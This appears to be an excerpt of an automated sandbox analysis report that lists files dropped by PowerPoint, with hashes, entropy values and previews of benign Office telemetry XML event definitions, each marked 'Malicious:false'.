                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701851" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Mobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcelMobile" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1369
                                                                                                                              Entropy (8bit):4.856329203731458
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9vKDiuMt1k3BNjXMi+EsdnKE+2h6wl/FfYmlBu:cdKiuMteNjXMzbdKshBd9Bu
                                                                                                                              MD5:70C9FD7930D05F6C33023761320B0CBC
                                                                                                                              SHA1:67BCE0044DADFA4BAC7106CEDF7888E14AF2ADEE
                                                                                                                              SHA-256:E06034DB8142BC440CEAE157936F7E7E3334874FF81E9A81EA0309E9A166BC71
                                                                                                                              SHA-512:7E67849DE3BAEC3531C2504E1A3A33DAA7EF76E29ADD485F9216E389BF20A374F86BE23DA233F3E7DAA9567787A15D08D40BDCBB46ADD779E3CADFD79FD35225
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Diagnostics" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDiagnostics" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1406
                                                                                                                              Entropy (8bit):4.889929045928819
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9zQSDiuct1k3BNjXMi+EsdnKE+2h6wl/FfYmlBu:cNQyiucteNjXMzbdKshBd9Bu
                                                                                                                              MD5:B9034C0C9143AF5225DA9645221E7917
                                                                                                                              SHA1:251BD49A87280053A868D828B61DF8534CE2FD49
                                                                                                                              SHA-256:9F7B8822B3EB45462F588B4220A3F8D754181FBE59CF4D1149DEF67C57D84B62
                                                                                                                              SHA-512:1176A1D00CF58FA61131317F292F3B784631815DCCC0969C37093419399A477565915001868AE515711ACED8BF5145347EEA6C95DFE34AAF1084D36BC3EE2076
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Diagnostics.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDiagnostics" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1379
                                                                                                                              Entropy (8bit):4.877346383504526
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d90HjTDuXCuMt1k3BNjXMi+EsdnKE+2h6wl/FfAC9:c4jfluMteNjXMzbdKshBdYM
                                                                                                                              MD5:EB441D671A38322EE807CD5BDA5E286E
                                                                                                                              SHA1:0D0E5982290AE2DE61F690BF841F5AE7269BC289
                                                                                                                              SHA-256:4F149C5B60B44541AE45B9EF603C8218FD63552B29AAA311B06567DAC3D7C44E
                                                                                                                              SHA-512:F78F88A8C6E4A7F91F23B7A422E1BF6A9C497C24B7B205564201A7231597EB44CB265F90D0FE562F552C1B0FB756E5FBFA65AB68A9754DE4640F4B7F1BB678F3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Extensibility" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOfficeExtensibility" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1416
                                                                                                                              Entropy (8bit):4.910169708231961
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9lhDuXCuct1k3BNjXMi+EsdnKE+2h6wl/FfAC9:crRlucteNjXMzbdKshBdYM
                                                                                                                              MD5:D567F8BB0A30CD0686098E282DC3CE81
                                                                                                                              SHA1:64EBFF6B42312ACF34D5F7D7E299C15530C2ED64
                                                                                                                              SHA-256:55C50CBE81DF8D8D28E0034C816ABE0669C64603097351526A382C91A65DAEC9
                                                                                                                              SHA-512:CA2A287824B2157BBA35F4C7082FF5B8827F96972B9439C4D7E4A0EC8941ED295FBA351EF2E4A21599D5AD19174C0F2CA564843826450DFEB69E705AF97BD12A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Extensibility.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOfficeExtensibility" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContract
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1359
                                                                                                                              Entropy (8bit):4.847219471844708
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d97eDeuMt1k3BNjXMi+EsdnKE+2h6wl/FfIz:cdueuMteNjXMzbdKshBdQz
                                                                                                                              MD5:9D476B531E8DA41C0A5ED4E239D6B608
                                                                                                                              SHA1:CEDF64800042FA58EBB83A9A6DA5162A1DD33B1F
                                                                                                                              SHA-256:12D10CC7648B4CF04A1CEE6AF9B6B30B590D26873F73877C9668FC547197536E
                                                                                                                              SHA-512:213EEA422E997D180C4CF16782376FAB3592C4C760EE920F6BD33A24EC8F1B7835501F50F97C3D7D578FF8ECB9AD00195F14429D27C82417CD46D9ACFB2A24E4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Canvas" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCanvas" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventType
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1396
                                                                                                                              Entropy (8bit):4.883161848414622
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9wmDeuct1k3BNjXMi+EsdnKE+2h6wl/FfIz:cS2eucteNjXMzbdKshBdQz
                                                                                                                              MD5:B9BF687E74025DF2569940711DAF8AA4
                                                                                                                              SHA1:F1F57E2AEAA9204AD316F1D1EDB26BE44450A902
                                                                                                                              SHA-256:FD24BDD9AF494E0FCBDE490252149BFAE30BC35127AE3C909FD268369C60FD3B
                                                                                                                              SHA-512:75D8656D26F54680CA8EC75BCC88560512C26CBD99A0FEE8011D9BB33D98380C2C3CEBD937FD805FE31448EE66BA19BDF20FE1B6FBC557637AB042B0FB2D40AC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Canvas.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCanvas" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.869360909608632
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9u3DBuMt1k3BNjXMi+EsdnKE+2h6wl/FfZdXxF:cgzBuMteNjXMzbdKshBdv
                                                                                                                              MD5:DBE9893A8EB8023E809A3FAEB0656D89
                                                                                                                              SHA1:18E6C669A5113B6195FC8896EDE86027E08F326F
                                                                                                                              SHA-256:0A787B6B1FF8015C7F510D8F97225F543E4F834757E4B613B400ABEB9321AF66
                                                                                                                              SHA-512:513E51894469C84C499A911CADA8F4515D5DFBB10D6FBE6A72B283FE9F5DB210CAC9D41E5CCE4B37548A8DA44BCD83C93AB0F25EF89BCF673BA549349C45D775
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Insights" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenInsights" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.903756644188613
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9pV/DBuct1k3BNjXMi+EsdnKE+2h6wl/FfZdXxF:crVBucteNjXMzbdKshBdv
                                                                                                                              MD5:830779C0CEA72EA22A414EA90C901513
                                                                                                                              SHA1:26FEF6C49EA022216364B168C99A4085B98E9D5A
                                                                                                                              SHA-256:FBE85A3BBD77573CB3235D935CD94D69557985FD4EAA4B0598890738A8564505
                                                                                                                              SHA-512:3440D27DD94649E43F1BEDDCEA1FE98761CF472AB1B519E68544126DF120FDA241C7C4FB1C4DCDC27DAA3752A49481C7F3B9528E23D38DB19146007CE1596A7D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Insights.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenInsights" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1370
                                                                                                                              Entropy (8bit):4.8734818259143164
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d941DVhuMt1k3BNjXMi+EsdnKE+2h6wl/Ff4N2l:c613uMteNjXMzbdKshBd7
                                                                                                                              MD5:DC825B13A6CCC5EAF723B80F00CB1C36
                                                                                                                              SHA1:327A6AA4D8B560321FAA3CE760F00E805FFF0B4B
                                                                                                                              SHA-256:795D06B04546DF2D59F7356036C9C3D2DC37A07A415E9A4C9D59A5F9C4379B12
                                                                                                                              SHA-512:3C8C8C27EB6CDC9C83F3BA6200D26DEE35DB758DBBCEB04BCEB7589BFF780B7D8C01848F10D3922D80C89881EE28286BA81F7DFEB684465E2E951F0CC7AA7BD4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Coauth" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcelCoauth" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1407
                                                                                                                              Entropy (8bit):4.907864691504703
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9jPDVhuct1k3BNjXMi+EsdnKE+2h6wl/Ff4N2l:cFL3ucteNjXMzbdKshBd7
                                                                                                                              MD5:30BC05A755F47783B673F4EEE9870607
                                                                                                                              SHA1:F07FF0D46443129C089104CE7FC3EE0413E1E74A
                                                                                                                              SHA-256:B567447C4F609274D89CD110AA7EC79D6ACB7898D292995B652EB4E5AB290405
                                                                                                                              SHA-512:1A10E82A3A34E8D156467D4C5F0C3E80ED7019C3DF9882FD6662E3923CCB5798037791DB1D7CAE81C555A513523BFE907180DDAF6392E27E48F077EE5AE0EB45
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Coauth.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcelCoauth" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1359
                                                                                                                              Entropy (8bit):4.8484339473244455
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9V1jDRpuMt1k3BNjXMi+EsdnKE+2h6wl/FfvnrQc:cP1PRpuMteNjXMzbdKshBdXL
                                                                                                                              MD5:7FB0C817901D941800C481A38A8CC17A
                                                                                                                              SHA1:20A20AC4CAAFFFE0E9D9B74F124CAD0058C125E9
                                                                                                                              SHA-256:614BAA2D9917DBDE24110978D4092EA2FEE838FA45F2641C750DBF87F4E9A83B
                                                                                                                              SHA-512:A7EA7E8DED442BAFD0881B47D2B276B1E991FB5B5E9C4DECE2AFC28158579BA54CEF6A8229BE20E35EF22AD4AE60D6F040633A5CFC197FDB946C7AD9869A6763
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventType
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1396
                                                                                                                              Entropy (8bit):4.883223789400444
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9K1JDRpuct1k3BNjXMi+EsdnKE+2h6wl/FfvnrQc:cE1ZRpucteNjXMzbdKshBdXL
                                                                                                                              MD5:7656765B7584DFB783360CB8F47E5D23
                                                                                                                              SHA1:B02517D35C9EA4260DD59935604E86986C5EBCC4
                                                                                                                              SHA-256:4003F869317FCB9E17D98F904DAAF832F83140F4630F901E7186597144118F13
                                                                                                                              SHA-512:4B7DAE54AB3F0C03F59C7531E660963F8047EB3481FEEC8F084FB5C947260ECE38E1E44581FFD9D9593CF64880661CF97A664365AB93ECD78AC66FD8777EADEA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1359
                                                                                                                              Entropy (8bit):4.8521344178314765
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d99XDpuMt1k3BNjXMi+EsdnKE+2h6wl/FfiNH:cbTpuMteNjXMzbdKshBdaNH
                                                                                                                              MD5:8B12A3BE5E9A298FD83BE50B551A8A32
                                                                                                                              SHA1:6CF04E21824563B41B78A5B0C381503654E14091
                                                                                                                              SHA-256:A567C13BDB63704D34B77F250A3C30DBCEB4CDE8C4DCFBCF8160CA73D0217021
                                                                                                                              SHA-512:23503BFF85AAA224CE26A58C3B57A59D44AFCC7967197D70D8F71AFDA751D30E3C030583BE5F82B7A7C5D7781E6DA34F66EB4596D4C92387A0F9954B848DBD67
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventType
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1396
                                                                                                                              Entropy (8bit):4.888051950170804
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9y1Dpuct1k3BNjXMi+EsdnKE+2h6wl/FfiNH:cQ1pucteNjXMzbdKshBdaNH
                                                                                                                              MD5:3CC524AD6BC477CD95CE494744D555EB
                                                                                                                              SHA1:44D551654E1970DFC0E227E95249A9ADAE21666C
                                                                                                                              SHA-256:ECD09824022E8907115AE81C5DA80797831985F1B5F96774652941004718C3FD
                                                                                                                              SHA-512:D1859D24B9C102BFD5B29340E7EEB19ED8918C18EF537C797173D30E77643B2A479AC8B263EA5FD1FCC7FDE941D4EFBF71A5C272CEB3224EE3C6B60D6B63221E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
